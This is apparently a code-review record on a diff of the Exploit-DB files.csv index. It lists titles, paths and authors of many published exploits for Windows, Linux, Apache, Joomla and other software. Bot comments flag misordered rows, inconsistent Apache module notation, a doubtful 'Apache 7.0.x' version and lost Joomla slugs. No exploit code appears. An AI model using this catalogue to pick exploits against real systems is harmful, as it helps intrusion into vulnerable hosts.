34167,platforms/win_x86/local/34167.rb,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)",2014-07-25,Metasploit,win_x86,local,0
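Review bot: The new row 40936 is inserted in the middle of the local block, between 34037 and 34131, whereas the other new local rows in this commit (40937, 40938, 40943) are appended after 40931 at the end of the block. If placement in files.csv is meant to follow a rule, this row looks misplaced; move it next to the other 409xx entries or document the ordering.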
@ -8714,6 +8716,9 @@ id,file,description,date,author,platform,type,port
40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
40921,platforms/linux/local/40921.sh,"Nagios < 4.2.4 - Privilege Escalation",2016-12-15,"Dawid Golunski",linux,local,0
40931,platforms/multiple/local/40931.txt,"iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free",2016-12-16,"Google Security Research",multiple,local,0
40937,platforms/linux/local/40937.txt,"Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution",2016-12-14,"Donncha OCearbhaill",linux,local,0
40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0
40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
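Review bot: Row 40943 is filed under platforms/linux/local with type local, but its title describes a "Drive-By Download" through Google Chrome, which reads as remotely delivered content. Please confirm the type and platform path for this row; if local is intentional because the trigger is a locally run helper ('tracker-extract', 'gnome-video-thumbnailer'), the title could say so.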
@ -8754,7 +8759,7 @@ id,file,description,date,author,platform,type,port
63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114
64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135
66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
67,platforms/multiple/remote/67.c,"Apache 1.3.x (mod_mylo) - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,linux,remote,21
@ -8793,7 +8798,7 @@ id,file,description,date,author,platform,type,port
126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80
127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (WebServer)",2003-11-22,nesumin,windows,remote,0
130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure",2003-12-06,m00,linux,remote,80
132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80
135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
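Review bot: Row 126 in the leading context, "Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit", still uses the old "Apache mod_x" shape while row 132 in the same hunk is rewritten to "(mod_userdir)". If the goal is one consistent module notation across the Apache entries, row 126 should be renamed in the same pass.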
@ -8972,7 +8977,7 @@ id,file,description,date,author,platform,type,port
758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Local Parsing Buffer Overflow",2005-01-16,nemo,osx,remote,0
759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode Exploit",2005-01-16,ATmaCA,windows,remote,0
761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162
764,platforms/unix/remote/764.c,"Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80
764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80
765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0
767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21
771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0
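Review bot: The new title for row 764 removes the parentheses around "< 2.8.7" but leaves "mod_ssl" unparenthesised, unlike the other renames in this commit such as "(mod_mylo)" and "(mod_userdir)". "Apache mod_ssl < 2.8.7 OpenSSL" also reads ambiguously as to which component the version bound applies to. Suggest the same shape as the other rows, with the module in parentheses and the version bound attached to it.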
@ -9964,7 +9969,7 @@ id,file,description,date,author,platform,type,port
9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0
9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0
9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0
9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (2)",2009-07-20,netsoul,windows,remote,0
9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray",2009-07-20,netsoul,windows,remote,0
9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0
9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0
9278,platforms/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0
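Review bot: The second 9214 row ends at "Remote Heap Spray" and so drops the "Exploit (2)" suffix, while 9181 two rows above still ends in "Remote Heap Spray Exploit (1)". The two entries no longer read as a numbered pair. Either keep "(2)" on 9214 or retitle 9181 in the same change so both follow one scheme.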
@ -10069,7 +10074,7 @@ id,file,description,date,author,platform,type,port
9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80
33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0
9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
9993,platforms/multiple/remote/9993.txt,"Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0
9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0
9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0
@ -10164,7 +10169,7 @@ id,file,description,date,author,platform,type,port
11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0
11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote,0
11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote,0
11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
@ -10849,7 +10854,7 @@ id,file,description,date,author,platform,type,port
16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8800
16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote,0
16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0
16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - (Windows x86) Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0
16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0
16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)",2010-11-22,Metasploit,multiple,remote,80
16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80
@ -11111,7 +11116,7 @@ id,file,description,date,author,platform,type,port
17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0
17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0
17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17969,platforms/multiple/remote/17969.py,"Apache (mod_proxy) - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
@ -12098,7 +12103,7 @@ id,file,description,date,author,platform,type,port
21200,platforms/linux/remote/21200.c,"Net-SNMP 4.2.3 - snmpnetstat Remote Heap Overflow",2002-01-03,"Juan M. de la Torre",linux,remote,0
21201,platforms/windows/remote/21201.pl,"BrowseFTP Client 1.62 - Buffer Overflow",2002-01-04,Kanatoko,windows,remote,0
21203,platforms/windows/remote/21203.txt,"Lucent 8.x - VitalNet Password Authentication Bypass",2002-01-16,"Mark Cooper",windows,remote,0
21204,platforms/windows/remote/21204.txt,"Apache 1.3.20 - Win32 PHP.exe Remote File Disclosure",2002-01-04,"Paul Brereton",windows,remote,0
21204,platforms/windows/remote/21204.txt,"Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure",2002-01-04,"Paul Brereton",windows,remote,0
21205,platforms/linux/remote/21205.c,"Boozt 0.9.8 - Buffer Overflow",2002-01-07,"Rafael San Miguel Carrasco",linux,remote,0
21207,platforms/windows/remote/21207.c,"RealPlayer 7.0/8.0 - Media File Buffer Overflow",2002-01-05,UNYUN,windows,remote,0
21210,platforms/linux/remote/21210.txt,"X-Chat 1.x - CTCP Ping Arbitrary Remote IRC Command Execution",2002-01-09,"Marcus Meissner",linux,remote,0
@ -12258,7 +12263,7 @@ id,file,description,date,author,platform,type,port
21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0
21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0
21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
21671,platforms/unix/remote/21671.c,"Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
40347,platforms/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote,0
@ -13440,7 +13445,7 @@ id,file,description,date,author,platform,type,port
27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
27607,platforms/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000
27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
27610,platforms/php/remote/27610.rb,"Joomla! Component 'com_media' - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,php,remote,80
27610,platforms/php/remote/27610.rb,"Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,php,remote,80
27611,platforms/windows/remote/27611.txt,"Oracle Java - IntegerInterleavedRaster.verify() Signed Integer Overflow",2013-08-15,"Packet Storm",windows,remote,0
27627,platforms/windows/remote/27627.txt,"Saxopress - URL Parameter Directory Traversal",2006-04-11,SecuriTeam,windows,remote,0
27630,platforms/linux/remote/27630.txt,"Plone 2.x - MembershipTool Access Control Bypass",2006-04-12,MJ0011,linux,remote,0
@ -13854,7 +13859,7 @@ id,file,description,date,author,platform,type,port
31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0
31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 - 'mod_negotiation' HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
@ -14674,7 +14679,7 @@ id,file,description,date,author,platform,type,port
36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0
36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0
36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
36352,platforms/linux/remote/36352.txt,"Apache 7.0.x 'mod_proxy'- Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
36352,platforms/linux/remote/36352.txt,"Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,windows,remote,0
36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0
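Review bot: The retitled 36352 row still says "Apache 7.0.x", which is not an Apache HTTP Server release line; the other Apache rows in this patch are all 1.3.x, 2.0.x, 2.2.x or 2.4.x. The change only moves mod_proxy into parentheses and carries the version over untouched. Since the row is being edited anyway, check the affected version against the advisory in 36352.txt and correct it here.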
@ -14717,7 +14722,7 @@ id,file,description,date,author,platform,type,port
36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667
36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit)",2015-04-06,Metasploit,jsp,remote,8080
36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 - 'mod_proxy' Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote,0
36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0
@ -15006,7 +15011,7 @@ id,file,description,date,author,platform,type,port
39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote,0
39194,platforms/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,remote,0
39195,platforms/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0
39196,platforms/linux/remote/39196.py,"Apache 'mod_wsgi' Module - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
39196,platforms/linux/remote/39196.py,"Apache (mod_wsgi) - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
39205,platforms/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0
39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0
39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21
@ -22766,7 +22771,7 @@ id,file,description,date,author,platform,type,port
12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin",2010-04-03,alnjm33,php,webapps,0
12034,platforms/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0
12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2010-04-03,l3D,hardware,webapps,0
12037,platforms/php/webapps/12037.txt,"Joomla! Component 'com_jp_jobs' 1.4.1 - SQL Injection",2010-04-03,Valentin,php,webapps,0
12037,platforms/php/webapps/12037.txt,"Joomla! Component JP Jobs 1.4.1 - SQL Injection",2010-04-03,Valentin,php,webapps,0
12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0
12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,multiple,webapps,0
12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0
@ -22782,28 +22787,28 @@ id,file,description,date,author,platform,type,port
12055,platforms/php/webapps/12055.txt,"Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
12056,platforms/php/webapps/12056.txt,"Joomla! Component 'com_wisroyq' 1.1 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
12057,platforms/php/webapps/12057.txt,"Joomla! Component 'com_press' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12058,platforms/php/webapps/12058.txt,"Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0
12058,platforms/php/webapps/12058.txt,"Joomla! Component Picasa 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0
12060,platforms/php/webapps/12060.txt,"Joomla! Component 'com_serie' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12061,platforms/php/webapps/12061.txt,"Facil-CMS 0.1RC2 - Local / Remote File Inclusion",2010-04-04,eidelweiss,php,webapps,0
12062,platforms/php/webapps/12062.txt,"Joomla! Component 'com_ranking' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12065,platforms/php/webapps/12065.txt,"Joomla! Component 'com_jinventory' - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0
12065,platforms/php/webapps/12065.txt,"Joomla! Component JInventory 1.23.02 - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0
12066,platforms/php/webapps/12066.txt,"Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12067,platforms/php/webapps/12067.txt,"Joomla! Component 'com_shoutbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12068,platforms/php/webapps/12068.txt,"Joomla! Component 'com_loginbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12068,platforms/php/webapps/12068.txt,"Joomla! Component LoginBox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12069,platforms/php/webapps/12069.txt,"Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12070,platforms/php/webapps/12070.txt,"Joomla! Component 'com_Joomlaupdater' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12070,platforms/php/webapps/12070.txt,"Joomla! Component Magic Updater - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12071,platforms/php/webapps/12071.txt,"jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2010-04-05,eidelweiss,php,webapps,0
12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps,0
12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0
12077,platforms/php/webapps/12077.txt,"Joomla! Component 'com_news_portal' 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12078,platforms/php/webapps/12078.txt,"Joomla! Component 'com_fss' 1.3 - 'faqid' Parameter SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0
12077,platforms/php/webapps/12077.txt,"Joomla! Component News Portal 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12078,platforms/php/webapps/12078.txt,"Joomla! Component Freestyle FAQ Lite 1.3 - 'faqid' Parameter SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0
12082,platforms/php/webapps/12082.txt,"Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12083,platforms/php/webapps/12083.txt,"Joomla! Component 'com_jwhmcs' 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12084,platforms/php/webapps/12084.txt,"Joomla! Component 'com_jukebox' 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12085,platforms/php/webapps/12085.txt,"Joomla! Component 'com_Joomlaflickr' 1.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12086,platforms/php/webapps/12086.txt,"Joomla! Component 'com_hsconfig' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12087,platforms/php/webapps/12087.txt,"Joomla! Component 'com_fabrik' 2.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12088,platforms/php/webapps/12088.txt,"Joomla! Component 'com_datafeeds' 880 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12083,platforms/php/webapps/12083.txt,"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12084,platforms/php/webapps/12084.txt,"Joomla! Component Juke Box 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12085,platforms/php/webapps/12085.txt,"Joomla! Component Joomla Flickr 1.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12086,platforms/php/webapps/12086.txt,"Joomla! Component Highslide 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12087,platforms/php/webapps/12087.txt,"Joomla! Component Fabrik 2.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12088,platforms/php/webapps/12088.txt,"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12089,platforms/php/webapps/12089.txt,"Joomla! Component 'com_appointment' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12092,platforms/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting",2010-04-06,"Nahuel Grisolia",hardware,webapps,0
12094,platforms/php/webapps/12094.txt,"ShopSystem - SQL Injection",2010-04-06,Valentin,php,webapps,0
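Review bot: The Joomla! retitles in this hunk replace the quoted component slug with a display name, and in several rows the new name shares no token with the old one: 12070 goes from 'com_Joomlaupdater' to "Magic Updater", 12086 from 'com_hsconfig' to "Highslide". The slug is the string a reader matches against an installed extension, so a title search on it stops finding these rows. Suggest keeping the slug alongside the display name, for example "Magic Updater (com_Joomlaupdater)". The hunk also ends up mixed, because 12055, 12056, 12057 and others keep the old 'com_...' form.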
